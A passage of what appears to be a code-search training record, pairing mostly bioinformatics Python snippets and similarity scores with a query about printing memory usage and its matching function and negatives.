return_peptide(RNA[frame[0]:frame[1]])\n\t\tresult.append(peptide)\n\treturn result", "def obtain_protein_names(dyn_id):\n model=DyndbModel.objects.select_related(\"id_protein\",\"id_complex_molecule\").get(dyndbdynamics__id=dyn_id)\n prot_li_names=[]\n if model.id_protein:\n gprot= model.id_protein.receptor_id_protein\n if gprot:#it means it is a GPCR\n prot_li_names.append(model.id_protein.name)\n else:\n dprot_li_all=DyndbProtein.objects.select_related(\"receptor_id_protein\").filter(dyndbcomplexprotein__id_complex_exp__dyndbcomplexmolecule=model.id_complex_molecule.id)\n for dprot in dprot_li_all:\n gprot= dprot.receptor_id_protein\n if gprot:#it means it is a GPCR\n prot_li_names.append(dprot.name)\n return \",\".join(prot_li_names)", "def get_longest_peptide(rna_sequence, genetic_code):\n #Create an empty list to store longest_peptide:\n pp_all=[]\n #use get_all_translation to get all 3 possible AA seq.\n polypeptide_list = get_all_translations(rna_sequence, genetic_code)\n #Create reverse complement sequence using reverse_and_complement function\n rev_c_seq = reverse_and_complement(rna_sequence)\n #use get_all_translation to get all 3 possible reverse_complement AA seq.\n polypeptide_list_rev_c=get_all_translations(rev_c_seq, genetic_code)\n #Concatenate all possible 6 AA sequences and store in pp_all list:\n pp_all=polypeptide_list+polypeptide_list_rev_c\n #Find the longest peptide, if RNA seq. is empty, return empty seq.\n if pp_all==[]:\n return \"\"\n else:\n return max(pp_all, key=len)", "def dummy_junction23():\n return 'junction:chr1:251-299:+'", "def action(self):\n\n base_seq = super().get_base_seq(self.__arguments, self.__dna_data, \"#@\")\n str_base_seq = base_seq.get_dna_string()\n seq_to_find = super().get_seq_to_be_found(self.__arguments, self.__dna_data)\n return str(str_base_seq.find(seq_to_find))", "def concat_pattern():\n pattern = is_tuple(None)\n pattern = is_op(\"concatenate\")(pattern)\n\n return pattern", "def get_complement(nucleotide):\n if nucleotide == 'A':\n return 'T'\n elif nucleotide == 'T':\n return 'A'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'", "def tournament():\n return min(sample(population, sample_size)).chromosome[:]", "def get_complement(nucleotide):\n\n if nucleotide == 'T':\n return 'A'\n elif nucleotide == 'A':\n return 'T'\n elif nucleotide == 'C':\n return 'G'\n elif nucleotide == 'G':\n return 'C'", "def sharedletters(self, idprofiler: \"IDProfiler\") -> str:\n shared: str = \"\"\n for i in range(len(self.rawstr)):\n if self.rawstr[i] is idprofiler.rawstr[i]:\n shared += self.rawstr[i]\n return shared", "def get_complement(nucleotide):\n if nucleotide=='A':\n \treturn 'T'\n if nucleotide=='C':\n \treturn 'G'\n if nucleotide=='T':\n \treturn 'A'\n if nucleotide=='G':\n \treturn 'C'", "def get_protein_inserted_sequence(self, parts: List,\n used_one_letter: bool) -> Optional[str]:\n # Check inserted sequences\n inserted_sequence = \"\"\n if used_one_letter:\n for i in range(len(parts[1])):\n aa = parts[1][i:i + 1]\n if len(aa) != 1:\n return None\n try:\n aa3_to_aa1_lut[aa1_to_aa3(aa.upper())]\n except KeyError:\n return None\n else:\n inserted_sequence += aa.upper()\n else:\n for i in range(0, len(parts[1]), 3):\n aa = parts[1][i:i + 3]\n if len(aa) != 3 or aa.capitalize() not in aa3_to_aa1_lut:\n if aa != \"ter\":\n return None\n\n try:\n inserted_sequence += aa3_to_aa1(aa.capitalize())\n except KeyError:\n return None\n\n return inserted_sequence if inserted_sequence else None", "def translate_framed_strand(framed_strand):\n\n polypeptide = []\n # Iterate through all the codons in our strand and look up their resultant amino acid\n logging.info(\"Translating strand: \" + str(framed_strand))\n for codon in framed_strand:\n if len(codon) != 3:\n break\n if codon in stop_codons:\n # We are at the end of the sequence, so cut.\n logging.debug(\"Stopping at codon \" + codon)\n break\n logging.debug(\"Adding polypeptide \" + codons_to_amino_acids[codon][2])\n polypeptide.append(codons_to_amino_acids[codon])\n return polypeptide", "def output(self):\n\t\treturn \"\".join(self.pieces)", "def recieve_proposals(self, joint=False):\n\n props = [p.strategy for p in self.participants]\n if not joint:\n return props\n return pd.concat(props).reset_index(drop=True)", "def getMergeLine(desc_line,CC3_sample,GP2_sample):\n return desc_line.strip(\"\\n\") + \"\" + CC3_sample + \"\" + GP2_sample + \"\\n\"", "def get_complement(nucleotide):\n #if statements change nucleotide inputs to their complementary nucleotide\n if nucleotide == \"A\":\n return \"T\"\n if nucleotide == \"T\":\n return \"A\" \n if nucleotide == \"C\":\n return \"G\"\n if nucleotide == \"G\":\n return \"C\"", "def gardRecomb(data, pvalue, dAT, hostFile):\n\t#try:\n\tlogger=logging.getLogger(\"main.recombination\")\n\tsetattr(data, \"lGard\", [])\n\tnb = 1\n\tdFrag = {}\n\tfor aln in dAT:\n\t logger.info(\"Running GARD on {:s}\".format(aln))\n\t gardRes = runGARD(aln, \n\t\t\t data.o, \n\t\t\t hostFile, \n\t\t\t data.logger)\n\t\t\t\n\t logger.info(\"Checked for recombination using HYPHY GARD.\")\n\t\t\t\t\n \n\t parsedFragments = parseGard(gardRes,\n aln,\n data.o, \n\t\t\t\t logger)\n\n\t logger.info(\"Parsed GARD results.\")\n\t if len(parsedFragments) > 0:\n\t for frag in parsedFragments:\n\t logger.info(\"Running Phyml on fragment: {:s}\".format(frag))\n\t fragTree = runPhyML(frag, \"\", data.o)\n\t dFrag[frag] = fragTree+\"_phyml_tree.txt\"\n\t else:\n\t logger.info(\"No fragments of recombination identified.\")\n\t \n\t dAT.update(dFrag)\n\t return(dAT)\n\t\n\t\"\"\"except Exception:\n\tlogger.info(\"GARD encountered an unexpected error, skipping.\")\n\treturn dAT\"\"\"", "def get_complement(nucleotide): # This one works\n nuc = list(nucleotide)\n count = 0\n complement = ''\n for element in nuc:\n if element == 'A':\n nuc[count] = 'T'\n elif element == 'T':\n nuc[count] = 'A'\n elif element == 'C':\n nuc[count] = 'G'\n elif element == 'G':\n nuc[count] = 'C'\n complement = complement + nuc[count]\n count = count + 1\n return complement", "def get_equipment(self):\n s = ''\n for i in range(12, 16):\n s += ' ' + str(self.dna[i])\n return s", "def getMatchup(self, name):\n if self.atHome:\n return (name, self.opponent)\n else:\n return (self.opponent, name)", "def get_sequence(self, part: str) -> Optional[str]:\n for char in part:\n if char.upper() not in self.base_nucleotides:\n return None\n return part.upper()", "def proteinTranslation(seq, geneticCode = STANDARD_GENETIC_CODE):\n\n seq = seq.replace('T','U') # Make sure we have RNA sequence\n proteinSeq = []\n \n i = 0\n while i+2 < len(seq):\n \n codon = seq[i:i+3]\n aminoAcid = geneticCode[codon]\n \n if aminoAcid is None: # Found stop codon\n break\n\n proteinSeq.append(aminoAcid)\n i += 3\n\n return proteinSeq", "def getResultPString(self):\n # TODO: WARNING!!! Make sure the resultPstring is emptied if we do some modification to the lsystem!! OR THIS WILL BEHAVE INCORRECTLY!\n if self.resultPString == None: self.resultPString = self.iterate()\n return self.resultPString", "def query_align_string(ref, cigar_int_pairs):\n out_ref = []\n ref_index = 0\n\n for b, cnt in cigar_int_pairs:\n sym = cigar_int_to_c(b) if isinstance(b, int) else b\n if sym in CIGAR_MATCH_MISSMATCH or sym in CIGAR_INSERTION:\n assert ref_index + cnt <= len(ref)\n out_ref.extend(ref[ref_index:ref_index + cnt])\n ref_index += cnt\n\n elif sym in CIGAR_DELETION:\n out_ref.extend(['-'] * cnt)\n return ''.join(out_ref)", "def dummy_junction34():\n return 'junction:chr1:351-399:+'", "def output(self):\n return \" \".join(self.pieces)", "def concatenate(sequence):\n\n return Profiles([x.data for y in sequence for x in y],\n [x.description for y in sequence for x in y])", "def format_hgvs_mutation(mutation_refseq_aa):\n if pd.isnull(mutation_refseq_aa):\n return (np.nan, np.nan, np.nan)\n refseq_base_id = mutation_refseq_aa.split(':')[0].split('.')[0]\n refseq_mutation = mutation_refseq_aa.split(':')[-1].lstrip('p.')\n refseq_mutation_pos = int(refseq_mutation[1:-1])\n return refseq_base_id, refseq_mutation, refseq_mutation_pos", "def cand_str(self):\n return \"\".join([str(x) for x in self.cands])", "def superstring(g):\n substrings = []\n last_overlap = 0\n i = source(g)\n while True:\n substrings.append(g.vertex_label(i)[last_overlap:])\n if g.outdegree(i) > 0:\n j = g.out_edges(i)[0][1]\n last_overlap = g.edge_weight(i, j)\n i = j\n else:\n break\n return \"\".join(substrings)", "def split_match(self, match):\n match, line, col, error, warning, message, near = super().split_match(match)\n if match:\n message = '[vcom] ' + message\n return match, line, col, error, warning, message, near", "def merge_by_intersection(self, p, C):\n \n if '' in C:\n # At least one of two without clusure\n if '?' in C:\n return NestedRE(p+p, '?')\n elif '*' in C:\n return NestedRE(p, '+')\n elif '+' in C:\n return NestedRE(p+p, '+')\n else:\n # Both without closure\n return NestedRE(p+p)\n # At least one has \"+\"\n elif '+' in C:\n return NestedRE(p, '+')\n elif '*' in C:\n return NestedRE(p, '*')\n # Only option left: both \"?\"\n else:\n return NestedRE(p+'?'+p+'?')", "def compose(self):\r\n return_str = \"\\t\".join([\r\n self.seqid,\r\n self.source,\r\n self.type,\r\n str(self.start),\r\n str(self.end),\r\n self.score,\r\n self.strand,\r\n self.phase,\r\n self.attributes.compose()\r\n ])\r\n return return_str", "def other_lines(line):\r\n res = \"\"\r\n for j, i in enumerate(line):\r\n res += i\r\n if j != len(line) - 1:\r\n res += '|'\r\n print(res)", "def get_separated_sequence():\n return [(\"ABCDEFG\", (\"ABEFG\", \"CD\")),\n (\"ABCDEFGCDCDDC\", (\"ABEFG\", \"CDCDCDDC\")),\n (\"\", (\"\", \"\")),\n ]", "def getMatch(reMatch,group=0):\n if reMatch: return reMatch.group(group)\n else: return ''", "def rest_of_ORF(dna):\n string = ''\n for i in xrange(0, len(dna), 3):\n codon = dna[i:i+3]\n if codon == 'TAG' or codon =='TAA' or codon =='TGA':\n return string\n else:\n string += codon\n return string", "def get_next_match_pick_first_available(population):\n p1 = None\n for player in population:\n if player.available:\n if p1 is not None:\n return p1, player\n else:\n p1 = player", "def getSequencefromPDB(pdbfile, chain='C', index=0):\n parser = PDB.PDBParser(QUIET=True)\n struct = parser.get_structure(pdbfile,pdbfile)\n ppb = PDB.PPBuilder()\n model = struct[0]\n peptides = ppb.build_peptides(model[chain])\n seq=''\n for i,pep in enumerate(peptides):\n seq+=str(pep.get_sequence())\n return seq", "def ndc_matcher_fragment (self) :\n sk = lambda ndc : (- len (ndc), ndc)\n ccs = sorted (self.ndc_info_map, key = sk)\n result = \"\".join ((\"(?P<ndc>\", \"|\".join (ccs), \")\"))\n return result", "def _get_extended_candidate(self, old_cand, new_char, new_char_index):\n new_text_state, new_word = old_cand.text_state.extended(new_char, new_char_index, sep=self.sep)\n if self.allowed_prefixes is not None and (new_word or new_text_state.last_word) not in self.allowed_prefixes:\n return None, None\n new_cand = self.text_to_candidate.get(new_text_state.text, None)\n if new_cand is None:\n new_cand = CtcBeamSearchCandidate(old_cand)\n self.text_to_candidate[new_text_state.text] = new_cand\n new_cand.text_state = new_text_state\n new_cand.new_logp_blank = -np.inf\n new_cand.new_logp_non_blank = -np.inf\n return new_cand, new_word", "def get_seq_from_pdbchain(chain):\n type_chain = check_type(chain)\n if type_chain == \"protein\":\n three_res_list = []\n for res in chain:\n residues_atoms = res.get_atoms()\n for atom in residues_atoms:\n if atom.get_name() == 'CA':\n residue = atom.get_parent()\n three_res_list.append(residue.get_resname())\n return three_to_one(three_res_list) # three_to_one function\n else:\n nucleic_acid_res = []\n for res in chain:\n residues_atoms = res.get_atoms()\n for atom in residues_atoms:\n if atom.get_name() == 'P':\n residue = atom.get_parent()\n nucleic_acid_res.append(residue.get_resname())\n nucleic_acid_seq = [x[2] for x in nucleic_acid_res]\n return \"\".join(nucleic_acid_seq)", "def triquad():\n return Formex(mpattern('12-34'))", "def get_summs_and_champs_from_match(self, match_id=None, match=None):\n if match_id is None: pass\n if match is None: match = self.get_match_by_id(match_id)\n\n s_ids = [p_id['player']['summonerId'] for p_id in match['participantIdentities']]\n c_ids = [p['championId'] for p in match['participants']]\n\n return s_ids, c_ids", "def dest(self) -> Optional[str]:\n if self._is_c():\n inst = self._cur()\n if \"=\" in inst:\n return inst.split(\"=\")[0]\n return None", "def make_potential(self):\n potential = ''\n for vpot in self.potentials:\n potential += vpot.get_content()\n return potential", "def solution(self) -> str:\n\n # \"Starting after the cup labeled 1, collect the other cups' labels clockwise into a single string with no\n # extra characters.\"\n\n self.current = 1\n eight_cups = self.pick_up_cups(8) # 9 cups in the circle, so all cups except '1' is 8 cups.\n\n answer = ''\n for cup in eight_cups:\n answer += str(cup)\n return answer", "def test_AppendMatch( self ):\n\t\tsource = BasicMethodSource()\n\t\tresult = self.parse( \"\"\"\n\t\t\tx := c*\n\t\t\tc := 'c'\n\t\t\"\"\", 'x', 'ccc', source)\n\t\tassert result == (1,[\n\t\t\t'c','c','c',\n\t\t],3), \"\"\"Result was %s\"\"\"%( result, )", "def asteriskify(matchobj):\n word = matchobj[0]\n return word[0] + '*' * (len(word)-2) + word[-1]", "def replace_char_candidate(self, char):\n for couple in self.char_couples:\n for i in range(2):\n if couple[i] == char:\n if i == 0:\n return couple[1]\n else:\n return couple[0]", "def output(self):\n\n return \"\".join(self.pieces)", "def get_complement(nucleotide):\n\t# TODO: implement this\n\tletter = str(nucleotide)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# set letter = parameter (make sure it's a string)\n\tif letter == 'A':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is A\n\t\treturn 'T'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return T\n\telif letter == 'T':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is T\n\t\treturn 'A'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return A\n\telif letter == 'G':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is G\n\t\treturn 'C'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return C\n\telif letter == 'C':\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# check if letter is C\n\t\treturn 'G'\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# return G\n\telse:\n\t\treturn None", "def extract(self): # type: () -> str\n if self.end():\n return self._src[self._marker :]\n else:\n return self._src[self._marker : self._idx]", "def getMatch(data):\n if len(data) > 15:\n return 'date: {0} {1}, match => {2}, {3}, {4}| 1x2 => {5}, {6}, {7}| handicap => {8}, {9}, {10}, {11}| OU => {12}, {13}, {14}, {15}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13], data[14], data[15], data[16])\n return 'date: {0} {1}, match => {2}, {3}, {4}| handicap => {5}, {6}, {7}, {8}| OU => {9}, {10}, {11}, {12}'.format(data[1], data[2], data[3], data[4], data[5], data[6], data[7], data[8], data[9], data[10], data[11], data[12], data[13])", "def digest(sequence, enzyme, count_missed_cleavages=None, no_missed_cleavages=False):\n tmp = \"\"\n result = []\n additionals = list()\n # for backwards compatibility e.g. sole use of kwarg \"no_missed_cleavages\"\n # and no use of no_missed_cleavages\n if count_missed_cleavages is None: # i.e. not set\n if no_missed_cleavages is False:\n count_missed_cleavages = 2\n else:\n count_missed_cleavages = 0\n\n cleavage_aa, site = enzyme\n for p, aa in enumerate(sequence):\n if aa == \"*\":\n continue\n tmp += aa\n if aa in cleavage_aa:\n if site == \"C\":\n result.append(tmp)\n tmp = \"\"\n elif site == \"N\":\n\n result.append(tmp[0 : len(tmp) - 1])\n tmp = \"\"\n tmp += aa\n if tmp != \"\":\n result.append(tmp)\n if count_missed_cleavages > len(result):\n count_missed_cleavages = len(result)\n\n if count_missed_cleavages == 0:\n additionals = result\n else:\n for r in range(len(result)):\n # r is the index of each fully-cleaved peptide in the list from above\n for mc in range(r, len(result) + 1):\n # now starting with 'r' we interrogate all other pepitdes and build further peptides\n # up to the desired number of missed cleavages\n if mc - r >= count_missed_cleavages:\n continue\n if mc + 2 > len(result):\n # i.e. if are over end of list\n continue\n # need to add 2 to mc a it's a location marker.\n # mc is essentially the first peptide in the list\n newpep = \"\".join(result[r : mc + 2])\n if newpep != \"\":\n additionals.append(newpep)\n additionals += result\n return additionals", "def find_range_from_cons_pos(my_pos, gpcr_pdb):\n (ext_range,chain)=gpcr_pdb[my_pos]\n pos_range=str(ext_range)\n #pos_range=ext_range+\"-\"+ext_range\n return pos_range", "def represent_polypeptide(polypeptide, verbosity_level=0):\n output_string = \"\"\n separator = \"\"\n separator_backspace = 0\n if verbosity_level == IUPAC_1:\n separator = \"\"\n amino_acid_repr_strings = [amino_acid.IUPAC_1 for amino_acid in polypeptide]\n elif verbosity_level == IUPAC_3:\n separator = \"/\"\n amino_acid_repr_strings = [amino_acid.IUPAC_3 for amino_acid in polypeptide]\n elif verbosity_level == FULL_NAME:\n separator = \", \"\n amino_acid_repr_strings = [amino_acid.full_name for amino_acid in polypeptide]\n else:\n raise ValueError(\"Representation verbosity level must be one of: IUPAC_1, IUPAC_3, FULL_NAME.\")\n \n return separator.join(amino_acid_repr_strings)", "def get_partions(self) -> Union[ndarray, Tuple[ndarray, ndarray]]:\n if self.fragmented:\n return (self[self._begin:], self[:self._end])\n else:\n return self[self._begin:self._end]", "def combine(self):\n # If the contents of this command should be hidden from the main .cfg,\n # discard them.\n if self.hide_children:\n return \"\"\n\n # Set the evaluation state of this instance to COMBINE, as its code has\n # been generated.\n self.eval_state = COMMAND_EVAL_COMBINE\n\n # output will store the contents of this instance; meaning its code and\n # the code of its children.\n output = []\n\n # Loop through children and evaluate them.\n for ch in self.children:\n # Only evaluate children if they haven't been yet (i.e., their eval\n # state is not COMMAND_EVAL_COMBINE)\n if ch.eval_state == COMMAND_EVAL_REGISTER:\n gen = ch.generate()\n if gen is not None:\n output.append('alias \"'+str(ch)+'\" \"'+gen+'\"')\n output.extend(ch.combine())\n\n return output", "def merge(know, information):\n return know\n # result = []\n # for i in range(len(know)):\n # a = know[i]\n # b = information[i]\n # r = []\n # for j in range(2):\n # if a[j] != '?':\n # r.append(a[j])\n # elif b[j] != '?':\n # r.append(b[j])\n # else:\n # r.append('?')\n # result.append(''.join(r))\n # return result", "def reformat_peptide(regex_pattern, unimod_name, peptide):\n mods = []\n peptide = peptide.strip()\n if \"#\" in peptide:\n peptide, tmp_mods = peptide.split(\"#\")\n if tmp_mods != \"\":\n for mod in tmp_mods.split(\";\"):\n uni_mod, pos = mod.split(\":\")\n mods.append((int(pos), uni_mod, \"old\", 0))\n\n compiled_pattern = re.compile(regex_pattern)\n\n peptide = peptide.replace(\"_\", \"\") # strip the underscores\n\n matched_mod_position = []\n for match_number, match in enumerate(re.finditer(compiled_pattern, peptide)):\n original_match_start = match.start()\n original_match_end = match.end()\n match_length = original_match_end - original_match_start\n if unimod_name is None:\n mod_name = match.group(0)\n else:\n mod_name = unimod_name\n mods.append((original_match_start, mod_name, \"new\", match_length))\n\n mods.sort()\n new_mods = []\n total_match_length = 0\n have_seen_new_mods = False\n for pos, mod_name, mod_info, match_length in mods:\n\n if have_seen_new_mods:\n pos -= total_match_length\n\n new_mods.append(\"{0}:{1}\".format(mod_name, pos))\n if mod_info == \"new\":\n have_seen_new_mods = True\n total_match_length += match_length\n\n peptide = re.sub(regex_pattern, \"\", peptide)\n if len(new_mods) > 0:\n formated_peptide = \"{0}#{1}\".format(peptide, \";\".join(new_mods))\n else:\n formated_peptide = peptide\n # print( mods, '>>>> ', new_mods )\n return formated_peptide", "def PrintResult(self):\n if len(self.matchList) <= 0:\n return \"Unfortunately: \" + self.name + \" did not match any applicants\"\n mystring = self.name + \" matched: \"\n isFirst = True\n for eachApplicant in self.matchList:\n if isFirst:\n isFirst = False\n else:\n mystring += \"\\n\"\n mystring += eachApplicant.name\n return mystring", "def __str__(self):\n st=\"\"\n for g in self:\n st+=g.fasta()\n st+=\"\\n\"\n return st", "def reference_align_string(ref, cigar_int_pairs):\n out_ref = []\n ref_index = 0\n\n for b, cnt in cigar_int_pairs:\n sym = cigar_int_to_c(b) if isinstance(b, int) else b\n if sym in CIGAR_MATCH_MISSMATCH or sym in CIGAR_DELETION:\n assert ref_index + cnt <= len(ref)\n out_ref.extend(ref[ref_index:ref_index + cnt])\n ref_index += cnt\n\n elif sym in CIGAR_INSERTION:\n out_ref.extend(['-'] * cnt)\n return ''.join(out_ref)", "def get_protein_hgvs(annotation):\n if '%3D' in annotation['HGVSp']: # \"%3D\" is \"=\"\n try:\n amino_acids = ''.join([protein_letters_1to3[x] for x in annotation['Amino_acids']])\n return \"p.\" + amino_acids + annotation['Protein_position'] + amino_acids\n except Exception, e:\n print 'Could not create HGVS for: %s' % annotation\n return annotation['HGVSp'].split(':')[-1]", "def jointext(firststring, secondstring):\n\n # Return the joined strings\n return str(firststring) + str(secondstring)" ]
[ "0.58377457", "0.57520026", "0.55693895", "0.51852643", "0.5118976", "0.5036226", "0.4998545", "0.49705812", "0.49523178", "0.49279532", "0.4873407", "0.4863047", "0.48540068", "0.48335233", "0.4816873", "0.48077628", "0.48022303", "0.48017293", "0.4800456", "0.4780788", "0.47767282", "0.47730425", "0.47571063", "0.47556517", "0.47248587", "0.46824276", "0.46683428", "0.46679625", "0.46656692", "0.4647296", "0.46428585", "0.46417877", "0.46137848", "0.4607667", "0.46054512", "0.46050906", "0.45925945", "0.45905784", "0.45903057", "0.4586811", "0.45603716", "0.45599985", "0.4558451", "0.45561484", "0.45521867", "0.45491546", "0.45324418", "0.45303044", "0.45193523", "0.45187455", "0.45118773", "0.45059392", "0.45001367", "0.4497346", "0.4495109", "0.4489706", "0.44757673", "0.44747636", "0.446993", "0.4460349", "0.44576207", "0.44566318", "0.4453202", "0.44522968", "0.44481802", "0.44403064", "0.44379005", "0.4435142", "0.44273886", "0.44270292", "0.44190246", "0.44182578", "0.44151235", "0.4404203", "0.4389795", "0.43860295", "0.43819475", "0.43811476", "0.43761364", "0.4370565", "0.4366926", "0.43612295", "0.43567038", "0.4346655", "0.43463942", "0.4343423", "0.43386364", "0.43376303", "0.43373385", "0.43370116", "0.43342015", "0.433291", "0.43311095", "0.43286368", "0.43272114", "0.43242705", "0.4319835", "0.4317403", "0.43140116", "0.43094656" ]
0.6651385
0
Print memory diagnostics including the active resident set size
def print_memory_diags(disable_print=False): process = psutil.Process(os.getpid()) memory = process.memory_info().rss/1000000000.0 if not disable_print: logging.info('\tMemory usage: {:.3f} GB'.format(memory)) return memory
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _mem_report(tensors: Iterable, mem_type: str) -> None:\n print(f\"Storage on {mem_type}\")\n print(\"-\" * LEN)\n total_numel = 0\n total_mem = 0\n visited_data: List[Any] = []\n for tensor in tensors:\n if tensor.is_sparse:\n continue\n # a data_ptr indicates a memory block allocated\n data_ptr = tensor.storage().data_ptr()\n if data_ptr in visited_data:\n continue\n visited_data.append(data_ptr)\n\n numel = tensor.storage().size()\n total_numel += numel\n element_size = tensor.storage().element_size()\n mem = numel * element_size / 1024 / 1024 # 32bit=4Byte, MByte\n total_mem += mem\n element_type = type(tensor).__name__\n size = tuple(tensor.size())\n\n if print_all:\n print(f\"{element_type}\\t\\t{size}\\t\\t{mem}\")\n print(\"-\" * LEN)\n print(f\"Total Tensors: {total_numel} \\tUsed Memory Space: {total_mem}\")\n print(\"-\" * LEN)", "def print_memory_stats(location_tag=\"undef\"):\n try:\n import psutil\n p = psutil.Process(os.getpid())\n rm, vm = p.get_memory_info()\n print \"MEM_STAT (%s) rm=%s, vm=%s\" % (location_tag, rm, vm)\n except ImportError:\n print \"psutil module not available\"", "def print_allocations(self, ):\n pass", "def show_mem(cmd, cnt, args):\n if cpu is None:\n log(\"Load program first\") \n return\n elif len(cpu.memory) == 0:\n log(\"Load program first\") \n return \n chunk = 0\n chunk_count = len(cpu.memory)\n while chunk < chunk_count: \n chunk_start = cpu.memory[chunk][MEMADDR]\n chunk_end = chunk_start + cpu.memory[chunk][MEMSIZE] \n log(\"{:d} {:#x}..{:#x}\".format(chunk, chunk_start, chunk_end)) \n chunk += 1\n if machine == \"ARM\":\n if len(cpu.high_memory) != 0:\n log(\"High memory\")\n for addr in sorted(cpu.high_memory):\n log(\"{:#x}\".format(addr))", "def display_memory(self) -> None:\n return self.__memory", "def get_memory_info():\n return psutil.virtual_memory()", "def show_mem_usage():\n gl = sys._getframe(1).f_globals\n vars = {}\n for k, v in list(gl.items()):\n # for pandas dataframes\n if hasattr(v, 'memory_usage'):\n mem = v.memory_usage(deep=True)\n if not np.isscalar(mem):\n mem = mem.sum()\n vars.setdefault(id(v), [mem]).append(k)\n # work around for a bug\n elif isinstance(v, pd.Panel):\n v = v.values\n vars.setdefault(id(v), [sys.getsizeof(v)]).append(k)\n total = 0\n for k, (value, *names) in vars.items():\n if value > 1e6:\n print(names, \"%.3fMB\" % (value / 1e6))\n total += value\n print(\"%.3fMB\" % (total / 1e6))", "def show_process_memory( cls, call_msg = \"\", log_level = None, print_it = False ):\n process = psutil.Process(os.getpid()) # import psutil\n mem = process.memory_info().rss\n # convert to mega and format\n mem_mega = mem/( 1e6 )\n msg = f\"{call_msg}process memory = {mem_mega:10,.2f} mega bytes \"\n if print_it:\n print( msg )\n if not ( log_level is None ):\n cls.__logger.log( log_level, msg )\n msg = f\"{mem_mega:10,.2f} mega bytes \"\n return ( mem, msg )", "def _dump_info(resolution, block_size, pwidth):\n V, H = resolution\n M, N = block_size\n bytes = int(ceil(pwidth / 8))\n mem_bytes = 2 * M * H * bytes\n print(\"Memory requirements:\")\n print(\" {:d} bytes for double buffer\".format(mem_bytes))\n\n return bytes, mem_bytes", "def report(self):\r\n print(\"\".join(self.memory), self.error, self.steps)", "def __repr__(self):\n return \"This {} has {} GB of memory\".format(\n self.name,\n self.memory_in_gb\n )", "def gather_info_and_display():\n # Obtain total rss displayed in memory.stat for each group,\n # container and service.\n try:\n output_mem = pipe_command(GREP_CMD, AWK_CMD, cwd=MEMPATH)\n LOG.debug(\n 'command: %s\\n%s',\n \"grep -rs total_rss '/sys/fs/cgroup/memory/' \"\n \"| awk '$2>0{print$0}' \",\n output_mem)\n except subprocess.CalledProcessError as error:\n LOG.error('Could not get total_rss memory, error=%s', error)\n return 1\n\n mem_info = get_meminfo()\n pt_groups = gather_groups_memory(output_mem)\n pt_cont = gather_containers_memory(output_mem)\n pt_serv = sys_service_memory()\n\n # Dump the tables out\n print('\\nPer groups memory usage:')\n\n # Get string to be printed and create list of elements separated by \\n\n list_of_table_lines = pt_groups.get_string().split('\\n')\n\n # Use the first line (+---+-- ...) as horizontal rule to insert later\n horizontal_line = list_of_table_lines[0]\n\n # Print the table, except last two lines ( \"Total\" row + final separator).\n print(\"\\n\".join(list_of_table_lines[:-2]))\n # Print separator, and finally the \"Total\" row.\n print(horizontal_line)\n print(\"\\n\".join(list_of_table_lines[-2:]))\n\n pt_namespc = prettytable.PrettyTable(\n ['Namespace',\n 'Resident Set Size (MiB)',\n ], caching=False)\n pt_namespc.align = 'l'\n pt_namespc.align['Resident Set Size (MiB)'] = 'r'\n\n print('\\nPer namespace memory usage:')\n for n_s in MEMORY['namespaces']:\n pt_namespc.add_row(\n [n_s,\n MEMORY['namespaces'][n_s],\n ])\n print(pt_namespc)\n\n print('\\nPer container memory usage:')\n print(pt_cont)\n\n print('\\nPer service memory usage:')\n print(pt_serv)\n\n base_mebib = 0.0\n k8s_system = 0.0\n k8s_addon = 0.0\n platform_memory_percent = 0.0\n\n # Calculate base memory usage (i.e., normal memory, exclude K8S and VMs)\n # e.g., docker, system.slice, user.slice\n for group in MEMORY['cgroups']:\n if group in BASE_GROUPS:\n base_mebib += float(MEMORY['cgroups'][group])\n\n # K8S platform system usage (essential) and addons usage (non-essential)\n for n_s in MEMORY['namespaces']:\n if n_s in K8S_NAMESPACE_SYSTEM:\n k8s_system += MEMORY['namespaces'][n_s]\n elif n_s in K8S_NAMESPACE_ADDON:\n k8s_addon += MEMORY['namespaces'][n_s]\n\n # Calculate platform memory usage\n platform_mebib = base_mebib + k8s_system\n\n anon_mebib = float(mem_to_mebibytes(\n mem_info['Active(anon)'] + mem_info['Inactive(anon)'])) * KBYTE\n avail_mebib = float(mem_to_mebibytes(\n mem_info['MemAvailable'])) * KBYTE\n total_mebib = float(anon_mebib + avail_mebib)\n\n anon_percent = py2_round(100 * anon_mebib / total_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n reserved_mebib = get_platform_reserved_memory()\n # Calculate platform memory in terms of percent reserved\n if reserved_mebib > 0.0:\n platform_memory_percent = py2_round(\n 100 * platform_mebib / reserved_mebib, DECIMAL_DIGITS) # pylint: disable=W1619\n\n pt_platf = prettytable.PrettyTable(\n ['Reserved',\n 'Platform',\n 'Base',\n 'K8s Platform system',\n 'k8s-addon'\n ], caching=False)\n pt_platf.align = 'l'\n\n pt_platf.add_row(\n [reserved_mebib,\n '{} ({}%)'.format(platform_mebib, platform_memory_percent),\n base_mebib,\n k8s_system,\n k8s_addon\n ])\n print('\\nPlatform memory usage in MiB:')\n print(pt_platf)\n\n pt_4k = prettytable.PrettyTable(\n ['Anon',\n 'Cgroup-rss',\n 'Available',\n 'Total'\n ], caching=False)\n pt_4k.align = 'l'\n\n pt_4k.add_row(\n ['{} ({}%)'.format(anon_mebib, anon_percent),\n MEMORY['cgroups']['total_rss'],\n avail_mebib,\n total_mebib\n ])\n\n print('\\n4K memory usage in MiB:')\n print(pt_4k)\n\n return 0", "def mem_info(self):\n\t\t\tavailable, total = cuda.mem_get_info() #Note: pycuda._driver.LogicError: cuMemGetInfo failed: context is destroyed\n\t\t\tprint(\"Available: %.2f GB\\nTotal: %.2f GB\"%(available/1e9, total/1e9))", "def mem_report(print_all: bool = False) -> None:\n\n def 